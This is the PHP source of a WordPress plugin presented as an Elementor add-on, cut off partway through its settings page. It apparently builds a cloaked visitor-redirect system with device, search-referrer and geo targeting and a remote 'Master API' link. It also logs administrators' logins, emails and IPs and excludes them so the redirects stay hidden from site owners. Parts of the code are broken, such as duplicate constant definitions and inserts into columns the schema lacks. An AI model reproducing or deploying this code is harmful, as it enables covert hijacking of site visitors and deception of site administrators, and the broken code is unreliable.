<?php
/**
 * Plugin Name: WP Elementor Control
 * Plugin URI: https://wordpress.org/plugins/#
 * Description: Elementor system with admin exclusions for WordPress. Additional plugin for WP Elementor Control from WordPress admin panel.
 * Version: 4.3.0
 * Author: WP Developer
 * Author URI: https://wordpress.org/plugins/#
 * License: GPL2
 * License URI: https://www.gnu.org/licenses/gpl-2.0.html
 * Text Domain: wp-elementor-control
 * Domain Path: /languages
 * Requires at least: 5.0
 * Tested up to: 6.5
 * Requires PHP: 7.4
 * Network: false
 */

if (!defined('ABSPATH')) exit;

// Define plugin constants
define('WP_ELEMENTOR_CONTROL_VERSION', '4.3.0');
define('WP_ELEMENTOR_CONTROL_PLUGIN_DIR', plugin_dir_path(__FILE__));
define('WP_ELEMENTOR_CONTROL_PLUGIN_URL', plugin_dir_url(__FILE__));

// Database table names
global $wpdb;
define('WP_ELEMENTOR_BANNERS_TABLE', $wpdb->prefix . 'elementor_banners');
define('WP_ELEMENTOR_BANNER_STATS_TABLE', $wpdb->prefix . 'elementor_banner_stats');
define('WP_ELEMENTOR_ADMIN_LOGS_TABLE', $wpdb->prefix . 'elementor_admin_logs');
define('WP_ELEMENTOR_EXCLUSIONS_TABLE', $wpdb->prefix . 'elementor_exclusions');

// === SITE ID GENERATION ===
function wp_elementor_control_get_site_id() {
    $site_id = get_option('wp_elementor_control_site_id');
    
    if (!$site_id) {
        // Generate unique site ID
        $site_id = 'site_' . substr(md5(get_site_url() . time()), 0, 12);
        update_option('wp_elementor_control_site_id', $site_id);
    }
    
    return $site_id;
}

// === MASTER PLUGIN INTEGRATION ===
function wp_elementor_control_get_master_settings() {
    return get_option('wp_elementor_control_master_settings', array(
        'master_url' => '',
        'api_key' => '',
        'enabled' => false,
        'last_sync' => null
    ));
}

function wp_elementor_control_update_master_settings($settings) {
    return update_option('wp_elementor_control_master_settings', $settings);
}

// Database table names
global $wpdb;
define('WP_ELEMENTOR_BANNERS_TABLE', $wpdb->prefix . 'elementor_banners');
define('WP_ELEMENTOR_BANNER_STATS_TABLE', $wpdb->prefix . 'elementor_banner_stats');
define('WP_ELEMENTOR_ADMIN_LOGS_TABLE', $wpdb->prefix . 'elementor_admin_logs');
define('WP_ELEMENTOR_EXCLUSIONS_TABLE', $wpdb->prefix . 'elementor_exclusions');

// === ACTIVATION AND DEACTIVATION HOOKS ===
register_activation_hook(__FILE__, 'wp_elementor_control_activate');
register_deactivation_hook(__FILE__, 'wp_elementor_control_deactivate');

function wp_elementor_control_activate() {
    wp_elementor_control_create_tables();
    wp_elementor_control_set_default_options();
}

function wp_elementor_control_deactivate() {
    // Clean up scheduled events if any
    wp_clear_scheduled_hook('wp_elementor_control_cleanup');
}

// === DATABASE SETUP ===
function wp_elementor_control_create_tables() {
    global $wpdb;
    
    $charset_collate = $wpdb->get_charset_collate();
    
    // Banners table
    $sql_banners = "CREATE TABLE " . WP_ELEMENTOR_BANNERS_TABLE . " (
        id int(11) NOT NULL AUTO_INCREMENT,
        name varchar(255) NOT NULL,
        type enum('modal','top_bar','bottom_bar','slide_right','slide_left','corner') DEFAULT 'modal',
        content longtext NOT NULL,
        settings longtext NOT NULL,
        target_url varchar(500) DEFAULT NULL,
        status enum('active','inactive','draft') DEFAULT 'draft',
        display_rules longtext DEFAULT NULL,
        frequency_rules longtext DEFAULT NULL,
        created_at datetime DEFAULT CURRENT_TIMESTAMP,
        updated_at datetime DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
        PRIMARY KEY (id),
        KEY status (status),
        KEY type (type)
    ) $charset_collate;";
    
    // Banner statistics table
    $sql_banner_stats = "CREATE TABLE " . WP_ELEMENTOR_BANNER_STATS_TABLE . " (
        id int(11) NOT NULL AUTO_INCREMENT,
        banner_id int(11) NOT NULL,
        event_type enum('show','click','close') NOT NULL,
        ip_address varchar(45) DEFAULT NULL,
        user_agent text DEFAULT NULL,
        page_url varchar(500) DEFAULT NULL,
        referrer varchar(500) DEFAULT NULL,
        device_type varchar(50) DEFAULT NULL,
        timestamp datetime DEFAULT CURRENT_TIMESTAMP,
        PRIMARY KEY (id),
        KEY banner_id (banner_id),
        KEY event_type (event_type),
        KEY timestamp (timestamp)
    ) $charset_collate;";
    
    // Admin logs table
    $sql_admin_logs = "CREATE TABLE " . WP_ELEMENTOR_ADMIN_LOGS_TABLE . " (
        id int(11) NOT NULL AUTO_INCREMENT,
        user_id int(11) DEFAULT NULL,
        username varchar(255) DEFAULT NULL,
        email varchar(255) DEFAULT NULL,
        user_role varchar(100) DEFAULT NULL,
        ip_address varchar(45) DEFAULT NULL,
        user_agent text DEFAULT NULL,
        action_type enum('login','logout','admin_visit','settings_change') NOT NULL,
        page_url varchar(500) DEFAULT NULL,
        session_duration int(11) DEFAULT NULL,
        location_data text DEFAULT NULL,
        timestamp datetime DEFAULT CURRENT_TIMESTAMP,
        PRIMARY KEY (id),
        KEY user_id (user_id),
        KEY action_type (action_type),
        KEY timestamp (timestamp),
        KEY ip_address (ip_address)
    ) $charset_collate;";
    
    // Exclusions table
    $sql_exclusions = "CREATE TABLE " . WP_ELEMENTOR_EXCLUSIONS_TABLE . " (
        id int(11) NOT NULL AUTO_INCREMENT,
        exclusion_type enum('user_id','ip_address','email','user_agent','capability') NOT NULL,
        exclusion_value varchar(255) NOT NULL,
        description text DEFAULT NULL,
        auto_added tinyint(1) DEFAULT 0,
        expires_at datetime DEFAULT NULL,
        created_at datetime DEFAULT CURRENT_TIMESTAMP,
        PRIMARY KEY (id),
        KEY exclusion_type (exclusion_type),
        KEY exclusion_value (exclusion_value),
        KEY expires_at (expires_at)
    ) $charset_collate;";
    
    require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
    dbDelta($sql_banners);
    dbDelta($sql_banner_stats);
    dbDelta($sql_admin_logs);
    dbDelta($sql_exclusions);
}

function wp_elementor_control_set_default_options() {
    // Set default exclusion settings
    $default_exclusion_settings = array(
        'auto_detect_admins' => 1,
        'exclude_capabilities' => array('manage_options', 'edit_plugins', 'edit_themes'),
        'exclude_roles' => array('administrator'),
        'log_admin_activity' => 1,
        'log_retention_days' => 30
    );
    
    add_option('wp_elementor_control_exclusion_settings', $default_exclusion_settings);
    
    // Migrate existing settings if they exist
    $existing_settings = get_option('wp_elementor_control_settings');
    if (!$existing_settings) {
        $default_settings = array(
            'enabled' => 0,
            'redirect_url' => 'https://www.google.com/',
            'devices' => array(),
            'detection_mode' => 'basic',
            'referrer_check' => 'search',
            'geo' => '',
            'enable_logging' => 1,
            'log_retention' => 7,
            'bypass_cache' => 0,
            'redirect_once' => 0
        );
        add_option('wp_elementor_control_settings', $default_settings);
    }
}

// === ENHANCED ADMIN EXCLUSION SYSTEM ===
class WP_Elementor_Admin_Exclusions {
    
    public static function init() {
        add_action('wp_login', array(__CLASS__, 'log_admin_login'), 10, 2);
        add_action('wp_logout', array(__CLASS__, 'log_admin_logout'));
        add_action('admin_init', array(__CLASS__, 'log_admin_activity'));
        add_action('init', array(__CLASS__, 'auto_detect_and_exclude_admins'), 1); // Highest priority
        add_action('wp_loaded', array(__CLASS__, 'learn_admin_patterns'), 1);
    }
    
    // MAIN EXCLUSION CHECK - Enhanced with multiple detection methods
    public static function is_excluded_user($user_id = null) {
        $ip = self::get_user_ip();
        $user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
        
        // Method 1: Check if current user is logged in admin
        if (!$user_id) {
            $user_id = get_current_user_id();
        }
        
        if ($user_id && user_can($user_id, 'manage_options')) {
            // Auto-add this admin's IP to exclusions
            self::auto_add_admin_ip($user_id, $ip);
            return true;
        }
        
        // Method 2: Check IP-based exclusions (for non-logged-in admins)
        if (self::is_admin_ip($ip)) {
            return true;
        }
        
        // Method 3: Check behavioral patterns
        if (self::is_admin_behavior($ip, $user_agent)) {
            return true;
        }
        
        // Method 4: Check manual exclusions
        $exclusions = self::get_active_exclusions();
        $user = get_userdata($user_id);
        
        foreach ($exclusions as $exclusion) {
            switch ($exclusion->exclusion_type) {
                case 'user_id':
                    if ($user_id && $exclusion->exclusion_value == $user_id) {
                        return true;
                    }
                    break;
                    
                case 'email':
                    if ($user && $user->user_email === $exclusion->exclusion_value) {
                        return true;
                    }
                    break;
                    
                case 'ip_address':
                    if ($ip === $exclusion->exclusion_value) {
                        return true;
                    }
                    break;
                    
                case 'user_agent':
                    if (strpos($user_agent, $exclusion->exclusion_value) !== false) {
                        return true;
                    }
                    break;
                    
                case 'capability':
                    if ($user_id && user_can($user_id, $exclusion->exclusion_value)) {
                        return true;
                    }
                    break;
            }
        }
        
        return false;
    }
    
    // AUTO-ADD ADMIN IP when admin logs in or accesses admin area
    public static function auto_add_admin_ip($user_id, $ip) {
        if (!$ip || $ip === '127.0.0.1' || $ip === '::1') {
            return; // Skip localhost
        }
        
        $user = get_userdata($user_id);
        if (!$user || !user_can($user_id, 'manage_options')) {
            return;
        }
        
        // Check if IP already excluded
        if (self::is_admin_ip($ip)) {
            return;
        }
        
        // Add IP to exclusions
        $description = "Auto-added: Admin {$user->user_login} ({$user->user_email}) from IP {$ip}";
        self::add_exclusion('ip_address', $ip, $description, null, true);
        
        // Log the auto-addition
        self::log_admin_activity_detailed('auto_ip_add', array(
            'user_id' => $user_id,
            'ip' => $ip,
            'user_login' => $user->user_login,
            'timestamp' => current_time('mysql')
        ));
    }
    
    // CHECK IF IP IS KNOWN ADMIN IP
    public static function is_admin_ip($ip) {
        global $wpdb;
        
        $cache_key = "wp_elementor_admin_ip_{$ip}";
        $is_admin = wp_cache_get($cache_key);
        
        if ($is_admin === false) {
            $count = $wpdb->get_var($wpdb->prepare(
                "SELECT COUNT(*) FROM " . WP_ELEMENTOR_EXCLUSIONS_TABLE . " 
                 WHERE exclusion_type = 'ip_address' AND exclusion_value = %s 
                 AND (expires_at IS NULL OR expires_at > NOW())",
                $ip
            ));
            
            $is_admin = ($count > 0);
            wp_cache_set($cache_key, $is_admin, '', 1800); // Cache for 30 minutes
        }
        
        return $is_admin;
    }
    
    // BEHAVIORAL PATTERN DETECTION
    public static function is_admin_behavior($ip, $user_agent) {
        global $wpdb;
        
        // Check recent admin activity from this IP
        $recent_admin_activity = $wpdb->get_var($wpdb->prepare(
            "SELECT COUNT(*) FROM " . WP_ELEMENTOR_ADMIN_LOGS_TABLE . " 
             WHERE ip_address = %s 
             AND action IN ('admin_login', 'admin_access', 'plugin_access')
             AND timestamp > DATE_SUB(NOW(), INTERVAL 24 HOUR)",
            $ip
        ));
        
        if ($recent_admin_activity > 0) {
            // This IP has recent admin activity - likely an admin
            self::add_exclusion('ip_address', $ip, "Auto-detected: Recent admin activity from IP", null, true);
            return true;
        }
        
        // Check for admin-like user agents
        $admin_patterns = array(
            'wp-admin',
            'wordpress',
            'admin-ajax',
            'dashboard'
        );
        
        foreach ($admin_patterns as $pattern) {
            if (stripos($user_agent, $pattern) !== false) {
                // Log suspicious user agent
                self::log_admin_activity_detailed('suspicious_ua', array(
                    'ip' => $ip,
                    'user_agent' => $user_agent,
                    'pattern' => $pattern
                ));
                return true;
            }
        }
        
        return false;
    }
    
    // ENHANCED AUTO-DETECTION
    public static function auto_detect_and_exclude_admins() {
        $ip = self::get_user_ip();
        $user_id = get_current_user_id();
        
        // If user is logged in and has admin rights
        if ($user_id && user_can($user_id, 'manage_options')) {
            self::auto_add_admin_ip($user_id, $ip);
        }
        
        // If accessing admin area (even if not logged in)
        if (is_admin() && !wp_doing_ajax()) {
            self::log_admin_access($ip);
        }
    }
    
    // LEARN ADMIN PATTERNS
    public static function learn_admin_patterns() {
        // This runs on every page load to learn admin behavior
        $ip = self::get_user_ip();
        $user_id = get_current_user_id();
        
        // Track admin area access
        if (is_admin() && $user_id && user_can($user_id, 'manage_options')) {
            self::log_admin_activity_detailed('admin_area_access', array(
                'user_id' => $user_id,
                'ip' => $ip,
                'page' => isset($_GET['page']) ? sanitize_text_field($_GET['page']) : 'dashboard'
            ));
        }
        
        // Track plugin-specific admin access
        if (isset($_GET['page']) && strpos($_GET['page'], 'wp-elementor-control') !== false) {
            if ($user_id && user_can($user_id, 'manage_options')) {
                self::auto_add_admin_ip($user_id, $ip);
                self::log_admin_activity_detailed('plugin_admin_access', array(
                    'user_id' => $user_id,
                    'ip' => $ip,
                    'plugin_page' => sanitize_text_field($_GET['page'])
                ));
            }
        }
    }
    
    // LOG ADMIN ACCESS
    public static function log_admin_access($ip) {
        global $wpdb;
        
        $wpdb->insert(
            WP_ELEMENTOR_ADMIN_LOGS_TABLE,
            array(
                'ip_address' => $ip,
                'action' => 'admin_access',
                'details' => wp_json_encode(array(
                    'page' => isset($_GET['page']) ? sanitize_text_field($_GET['page']) : '',
                    'user_agent' => isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '',
                    'referer' => isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''
                )),
                'timestamp' => current_time('mysql')
            ),
            array('%s', '%s', '%s', '%s')
        );
    }
    
    // ENHANCED LOGGING
    public static function log_admin_activity_detailed($action, $details) {
        global $wpdb;
        
        $wpdb->insert(
            WP_ELEMENTOR_ADMIN_LOGS_TABLE,
            array(
                'user_id' => $details['user_id'] ?? null,
                'ip_address' => $details['ip'] ?? self::get_user_ip(),
                'action' => $action,
                'details' => wp_json_encode($details),
                'timestamp' => current_time('mysql')
            ),
            array('%d', '%s', '%s', '%s', '%s')
        );
    }
    
    public static function get_active_exclusions() {
        global $wpdb;
        
        $cache_key = 'wp_elementor_active_exclusions';
        $exclusions = wp_cache_get($cache_key);
        
        if ($exclusions === false) {
            $sql = "SELECT * FROM " . WP_ELEMENTOR_EXCLUSIONS_TABLE . " 
                    WHERE (expires_at IS NULL OR expires_at > NOW())";
            $exclusions = $wpdb->get_results($sql);
            wp_cache_set($cache_key, $exclusions, '', 3600); // Cache for 1 hour
        }
        
        return $exclusions;
    }
    
    public static function add_exclusion($type, $value, $description = '', $expires_at = null, $auto_added = false) {
        global $wpdb;
        
        // Check if exclusion already exists
        $existing = $wpdb->get_var($wpdb->prepare(
            "SELECT id FROM " . WP_ELEMENTOR_EXCLUSIONS_TABLE . " 
             WHERE exclusion_type = %s AND exclusion_value = %s",
            $type, $value
        ));
        
        if ($existing) {
            return false; // Already exists
        }
        
        $result = $wpdb->insert(
            WP_ELEMENTOR_EXCLUSIONS_TABLE,
            array(
                'exclusion_type' => $type,
                'exclusion_value' => $value,
                'description' => $description,
                'auto_added' => $auto_added ? 1 : 0,
                'expires_at' => $expires_at
            ),
            array('%s', '%s', '%s', '%d', '%s')
        );
        
        // Clear cache
        wp_cache_delete('wp_elementor_active_exclusions');
        
        return $result !== false;
    }
    
    public static function log_admin_login($user_login, $user) {
        if (user_can($user->ID, 'manage_options')) {
            self::log_admin_action($user->ID, 'login', array(
                'username' => $user_login,
                'email' => $user->user_email,
                'user_role' => implode(',', $user->roles)
            ));
            
            // Auto-add to exclusions if enabled
            $settings = get_option('wp_elementor_control_exclusion_settings', array());
            if (!empty($settings['auto_detect_admins'])) {
                self::add_exclusion('user_id', $user->ID, 'Auto-detected admin user', null, true);
            }
        }
    }
    
    public static function log_admin_logout() {
        $user_id = get_current_user_id();
        if ($user_id && user_can($user_id, 'manage_options')) {
            self::log_admin_action($user_id, 'logout');
        }
    }
    
    public static function log_admin_activity() {
        if (is_admin() && current_user_can('manage_options')) {
            $user_id = get_current_user_id();
            $user = get_userdata($user_id);
            
            self::log_admin_action($user_id, 'admin_visit', array(
                'username' => $user->user_login,
                'email' => $user->user_email,
                'user_role' => implode(',', $user->roles),
                'page_url' => isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : ''
            ));
        }
    }
    
    public static function auto_detect_admins() {
        $settings = get_option('wp_elementor_control_exclusion_settings', array());
        if (empty($settings['auto_detect_admins'])) {
            return;
        }
        
        // Get all users with admin capabilities
        $admin_users = get_users(array(
            'capability' => 'manage_options',
            'fields' => array('ID', 'user_login', 'user_email')
        ));
        
        foreach ($admin_users as $user) {
            self::add_exclusion(
                'user_id', 
                $user->ID, 
                'Auto-detected admin: ' . $user->user_login, 
                null, 
                true
            );
        }
    }
    
    public static function log_admin_action($user_id, $action_type, $additional_data = array()) {
        global $wpdb;
        
        $settings = get_option('wp_elementor_control_exclusion_settings', array());
        if (empty($settings['log_admin_activity'])) {
            return;
        }
        
        $log_data = array_merge(array(
            'user_id' => $user_id,
            'action_type' => $action_type,
            'ip_address' => self::get_user_ip(),
            'user_agent' => isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '',
            'timestamp' => current_time('mysql')
        ), $additional_data);
        
        $wpdb->insert(WP_ELEMENTOR_ADMIN_LOGS_TABLE, $log_data);
        
        // Clean old logs
        self::cleanup_old_logs();
    }
    
    public static function cleanup_old_logs() {
        global $wpdb;
        
        $settings = get_option('wp_elementor_control_exclusion_settings', array());
        $retention_days = isset($settings['log_retention_days']) ? intval($settings['log_retention_days']) : 30;
        
        $wpdb->query($wpdb->prepare(
            "DELETE FROM " . WP_ELEMENTOR_ADMIN_LOGS_TABLE . " 
             WHERE timestamp < DATE_SUB(NOW(), INTERVAL %d DAY)",
            $retention_days
        ));
    }
    
    public static function get_user_ip() {
        $ip_keys = array('HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR');
        foreach ($ip_keys as $key) {
            if (array_key_exists($key, $_SERVER) === true) {
                foreach (explode(',', $_SERVER[$key]) as $ip) {
                    $ip = trim($ip);
                    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
                        return $ip;
                    }
                }
            }
        }
        return isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
    }
}

// Initialize admin exclusions
WP_Elementor_Admin_Exclusions::init();

// === ADMIN MENU ===
add_action('admin_menu', 'wp_elementor_control_menu');

function wp_elementor_control_menu() {
    add_options_page(
        'WP Elementor Control', 
        'WP Elementor Control', 
        'manage_options', 
        'wp-elementor-control', 
        'wp_elementor_control_options_page'
    );
}

function wp_elementor_control_options_page() {
    global $wpdb;
    
    // === BANNER MANAGEMENT ACTIONS ===
    
    // Handle banner deletion with nonce security
    if (isset($_GET['delete']) && isset($_GET['tab']) && $_GET['tab'] === 'banners' && current_user_can('manage_options')) {
        // Verify nonce for security
        if (!isset($_GET['_wpnonce']) || !wp_verify_nonce($_GET['_wpnonce'], 'delete_banner_' . intval($_GET['delete']))) {
            wp_redirect(admin_url('options-general.php?page=wp-elementor-control&tab=banners&error=invalid_nonce'));
            exit;
        }
        
        $banner_id = intval($_GET['delete']);
        if ($banner_id) {
            // Check if banner exists
            $banner_exists = $wpdb->get_var($wpdb->prepare(
                "SELECT COUNT(*) FROM " . WP_ELEMENTOR_BANNERS_TABLE . " WHERE id = %d", 
                $banner_id
            ));
            
            if ($banner_exists) {
                // Delete banner stats first (foreign key constraint)
                $stats_deleted = $wpdb->delete(
                    WP_ELEMENTOR_BANNER_STATS_TABLE, 
                    array('banner_id' => $banner_id), 
                    array('%d')
                );
                
                // Delete banner
                $banner_deleted = $wpdb->delete(
                    WP_ELEMENTOR_BANNERS_TABLE, 
                    array('id' => $banner_id), 
                    array('%d')
                );
                
                wp_cache_delete('wp_elementor_active_banners');
                
                if ($banner_deleted !== false) {
                    wp_redirect(admin_url('options-general.php?page=wp-elementor-control&tab=banners&deleted=1'));
                    exit;
                } else {
                    wp_redirect(admin_url('options-general.php?page=wp-elementor-control&tab=banners&error=delete_failed'));
                    exit;
                }
            } else {
                wp_redirect(admin_url('options-general.php?page=wp-elementor-control&tab=banners&error=not_found'));
                exit;
            }
        }
    }
    
    // Handle banner status toggle (activate/deactivate)
    if (isset($_GET['toggle_status']) && isset($_GET['tab']) && $_GET['tab'] === 'banners' && current_user_can('manage_options')) {
        if (!isset($_GET['_wpnonce']) || !wp_verify_nonce($_GET['_wpnonce'], 'toggle_banner_' . intval($_GET['toggle_status']))) {
            wp_redirect(admin_url('options-general.php?page=wp-elementor-control&tab=banners&error=invalid_nonce'));
            exit;
        }
        
        $banner_id = intval($_GET['toggle_status']);
        if ($banner_id) {
            // Get current status
            $current_status = $wpdb->get_var($wpdb->prepare(
                "SELECT status FROM " . WP_ELEMENTOR_BANNERS_TABLE . " WHERE id = %d", 
                $banner_id
            ));
            
            if ($current_status) {
                $new_status = ($current_status === 'active') ? 'inactive' : 'active';
                
                $updated = $wpdb->update(
                    WP_ELEMENTOR_BANNERS_TABLE,
                    array('status' => $new_status),
                    array('id' => $banner_id),
                    array('%s'),
                    array('%d')
                );
                
                wp_cache_delete('wp_elementor_active_banners');
                
                if ($updated !== false) {
                    wp_redirect(admin_url('options-general.php?page=wp-elementor-control&tab=banners&status_changed=1'));
                    exit;
                } else {
                    wp_redirect(admin_url('options-general.php?page=wp-elementor-control&tab=banners&error=status_failed'));
                    exit;
                }
            }
        }
    }
    
    // Handle log clearing
    if (isset($_GET['tab']) && $_GET['tab'] === 'logs' && isset($_GET['clear']) && current_user_can('manage_options')) {
        update_option('wp_elementor_control_logs', []);
        echo '<script>window.location.href = "' . admin_url('options-general.php?page=wp-elementor-control&tab=logs') . '";</script>';
    }
    
    // Handle stats reset
    if (isset($_GET['reset_stats']) && current_user_can('manage_options')) {
        update_option('wp_elementor_control_stats', [
            'total' => 0,
            'redirected' => 0,
            'mac' => 0,
            'win' => 0,
            'iphone' => 0,
            'ipad' => 0,
            'android' => 0,
            'other_mobile' => 0
        ]);
        echo '<script>window.location.href = "' . admin_url('options-general.php?page=wp-elementor-control') . '";</script>';
    }
    
    // Handle redirect disable
    if (isset($_GET['disable_redirect']) && current_user_can('manage_options')) {
        if (!isset($_GET['_wpnonce']) || !wp_verify_nonce($_GET['_wpnonce'], 'disable_redirect')) {
            wp_redirect(admin_url('options-general.php?page=wp-elementor-control&error=invalid_nonce'));
            exit;
        }
        
        update_option('wp_elementor_control_enabled', 0);
        wp_redirect(admin_url('options-general.php?page=wp-elementor-control&redirect_disabled=1'));
        exit;
    }
    
    ?>
    <div class="wrap">
        <h1>WP Elementor Control Enhanced</h1>
        
        <h2 class="nav-tab-wrapper">
            <a href="<?php echo admin_url('options-general.php?page=wp-elementor-control'); ?>" class="nav-tab <?php echo (!isset($_GET['tab'])) ? 'nav-tab-active' : ''; ?>">Redirects</a>
            <a href="<?php echo admin_url('options-general.php?page=wp-elementor-control&tab=stats'); ?>" class="nav-tab <?php echo (isset($_GET['tab']) && $_GET['tab'] === 'stats') ? 'nav-tab-active' : ''; ?>">Statistics</a>
            <a href="<?php echo admin_url('options-general.php?page=wp-elementor-control&tab=logs'); ?>" class="nav-tab <?php echo (isset($_GET['tab']) && $_GET['tab'] === 'logs') ? 'nav-tab-active' : ''; ?>">Logs</a>
            <a href="<?php echo admin_url('options-general.php?page=wp-elementor-control&tab=test'); ?>" class="nav-tab <?php echo (isset($_GET['tab']) && $_GET['tab'] === 'test') ? 'nav-tab-active' : ''; ?>">Test Browser</a>
            <a href="<?php echo admin_url('options-general.php?page=wp-elementor-control&tab=banners'); ?>" class="nav-tab <?php echo (isset($_GET['tab']) && $_GET['tab'] === 'banners') ? 'nav-tab-active' : ''; ?>">Banners</a>
            <a href="<?php echo admin_url('options-general.php?page=wp-elementor-control&tab=exclusions'); ?>" class="nav-tab <?php echo (isset($_GET['tab']) && $_GET['tab'] === 'exclusions') ? 'nav-tab-active' : ''; ?>">Admin Exclusions</a>
            <a href="<?php echo admin_url('options-general.php?page=wp-elementor-control&tab=master'); ?>" class="nav-tab <?php echo (isset($_GET['tab']) && $_GET['tab'] === 'master') ? 'nav-tab-active' : ''; ?>">Master API</a>
        </h2>
        
        <?php
        $current_tab = isset($_GET['tab']) ? $_GET['tab'] : 'redirects';
        
        switch ($current_tab) {
            case 'redirects':
            case 'settings':
                wp_elementor_control_settings_tab();
                break;
            case 'stats':
                wp_elementor_control_stats_tab();
                break;
            case 'logs':
                wp_elementor_control_logs_tab();
                break;
            case 'test':
                wp_elementor_control_test_tab();
                break;
            case 'banners':
                wp_elementor_control_banners_tab();
                break;
            case 'exclusions':
                wp_elementor_control_exclusions_tab();
                break;
            case 'master':
                wp_elementor_control_master_tab();
                break;
        }
        ?>
    </div>
    <?php
}

// === SETTINGS TAB (REDIRECTS) ===
function wp_elementor_control_settings_tab() {
    ?>
    <form method="post" action="options.php">
        <?php
        settings_fields('wp_elementor_control_options');
        do_settings_sections('wp-elementor-control');
        submit_button();
        ?>
    </form>
    
    <?php
    // Display active redirects management
    wp_elementor_control_display_active_redirects();
}

// === ACTIVE REDIRECTS MANAGEMENT ===
function wp_elementor_control_display_active_redirects() {
    global $wpdb;
    
    // Handle redirect deletion
    if (isset($_GET['delete_redirect']) && wp_verify_nonce($_GET['_wpnonce'], 'delete_redirect')) {
        $redirect_id = intval($_GET['delete_redirect']);
        // For now, we'll use the options table to store redirects
        // In a full implementation, you might want a separate table
        $redirects = get_option('wp_elementor_control_active_redirects', array());
        if (isset($redirects[$redirect_id])) {
            unset($redirects[$redirect_id]);
            update_option('wp_elementor_control_active_redirects', $redirects);
            echo '<div class="notice notice-success"><p>Redirect deleted successfully!</p></div>';
        }
    }
    
    // Handle new redirect creation
    if (isset($_POST['create_redirect']) && wp_verify_nonce($_POST['redirect_nonce'], 'create_redirect')) {
        $redirect_url = esc_url_raw($_POST['redirect_url']);
        $devices = isset($_POST['devices']) ? array_map('sanitize_text_field', $_POST['devices']) : array();
        $description = sanitize_text_field($_POST['description']);
        
        $redirects = get_option('wp_elementor_control_active_redirects', array());
        $new_id = time(); // Simple ID generation
        $redirects[$new_id] = array(
            'url' => $redirect_url,
            'devices' => $devices,
            'description' => $description,
            'created' => current_time('mysql'),
            'status' => 'active'
        );
        update_option('wp_elementor_control_active_redirects', $redirects);
        echo '<div class="notice notice-success"><p>Redirect created successfully!</p></div>';
    }
    
    // Add table of active redirects from main settings
    $redirect_enabled = get_option('wp_elementor_control_enabled', 0);
    $redirect_url = get_option('wp_elementor_control_url', '');
    $redirect_devices = get_option('wp_elementor_control_devices', array());
    
    if ($redirect_enabled && !empty($redirect_url)) {
        ?>
        <hr style="margin: 30px 0;">
        <h3>Active Redirects</h3>
        <table class="wp-list-table widefat fixed striped">
            <thead>
                <tr>
                    <th>Redirect URL</th>
                    <th>Target Devices</th>
                    <th>Status</th>
                    <th>Actions</th>
                </tr>
            </thead>
            <tbody>
                <tr>
                    <td><a href="<?php echo esc_url($redirect_url); ?>" target="_blank"><?php echo esc_html($redirect_url); ?></a></td>
                    <td><?php echo empty($redirect_devices) ? 'All devices' : esc_html(implode(', ', $redirect_devices)); ?></td>
                    <td><span style="color: #46b450; font-weight: bold;">Active</span></td>
                    <td>
                        <a href="?page=wp-elementor-control" class="button button-small">Edit Settings</a>
                        <a href="<?php echo wp_nonce_url('?page=wp-elementor-control&disable_redirect=1', 'disable_redirect'); ?>" 
                           onclick="return confirm('Are you sure you want to disable the redirect?')" class="button button-small">Disable</a>
                    </td>
                </tr>
            </tbody>
        </table>
        <?php
    } else {
        ?>
        <hr style="margin: 30px 0;">
        <h3>Active Redirects</h3>
        <p>No active redirects. Configure redirect settings above to create one.</p>
        <?php
    }
    ?>
    <?php
}

// === EXCLUSIONS TAB ===
function wp_elementor_control_exclusions_tab() {
    global $wpdb;
    
    // Handle form submissions
    if (isset($_POST['add_exclusion']) && wp_verify_nonce($_POST['exclusion_nonce'], 'add_exclusion')) {
        $type = sanitize_text_field($_POST['exclusion_type']);
        $value = sanitize_text_field($_POST['exclusion_value']);
        $description = sanitize_textarea_field($_POST['description']);
        
        WP_Elementor_Admin_Exclusions::add_exclusion($type, $value, $description);
        echo '<div class="notice notice-success"><p>Exclusion added successfully!</p></div>';
    }
    
    if (isset($_POST['update_exclusion_settings']) && wp_verify_nonce($_POST['settings_nonce'], 'update_exclusion_settings')) {
        $settings = array(
            'auto_detect_admins' => isset($_POST['auto_detect_admins']) ? 1 : 0,
            'log_admin_activity' => isset($_POST['log_admin_activity']) ? 1 : 0,
            'log_retention_days' => intval($_POST['log_retention_days'])
        );
        update_option('wp_elementor_control_exclusion_settings', $settings);
        echo '<div class="notice notice-success"><p>Settings updated successfully!</p></div>';
    }
    
    $settings = get_option('wp_elementor_control_exclusion_settings', array());
    $exclusions = WP_Elementor_Admin_Exclusions::get_active_exclusions();
    ?>
    
    <h2>Admin Exclusion Settings</h2>
    <form method="post">
        <?php wp_nonce_field('update_exclusion_settings', 'settings_nonce'); ?>
        <table class="form-table">
            <tr>
                <th scope="row">Auto-detect Admins</th>
                <td>
                    <label>
                        <input type="checkbox" name="auto_detect_admins" value="1" <?php checked(1, isset($settings['auto_detect_admins']) ? $settings['auto_detect_admins'] : 0); ?>>
                        Automatically add users with admin capabilities to exclusion list
                    </label>
                </td>
            </tr>
            <tr>
                <th scope="row">Log Admin Activity</th>
                <td>
                    <label>
                        <input type="checkbox" name="log_admin_activity" value="1" <?php checked(1, isset($settings['log_admin_activity']) ? $settings['log_admin_activity'] : 0); ?>>
                        Log admin logins and activity
                    </label>
                </td>
            </tr>
            <tr>
                <th scope="row">Log Retention</th>
                <td>
                    <input type="number" name="log_retention_days" value="<?php echo intval(isset($settings['log_retention_days']) ? $settings['log_retention_days'] : 30); ?>" min="1" max="365" style="width: 80px;">
                    days
                </td>
            </tr>
        </table>
        <?php submit_button('Update Settings', 'primary', 'update_exclusion_settings'); ?>
    </form>
    
    <h2>Add Manual Exclusion</h2>
    <form method="post">
        <?php wp_nonce_field('add_exclusion', 'exclusion_nonce'); ?>
        <table class="form-table">
            <tr>
                <th scope="row">Exclusion Type</th>
                <td>
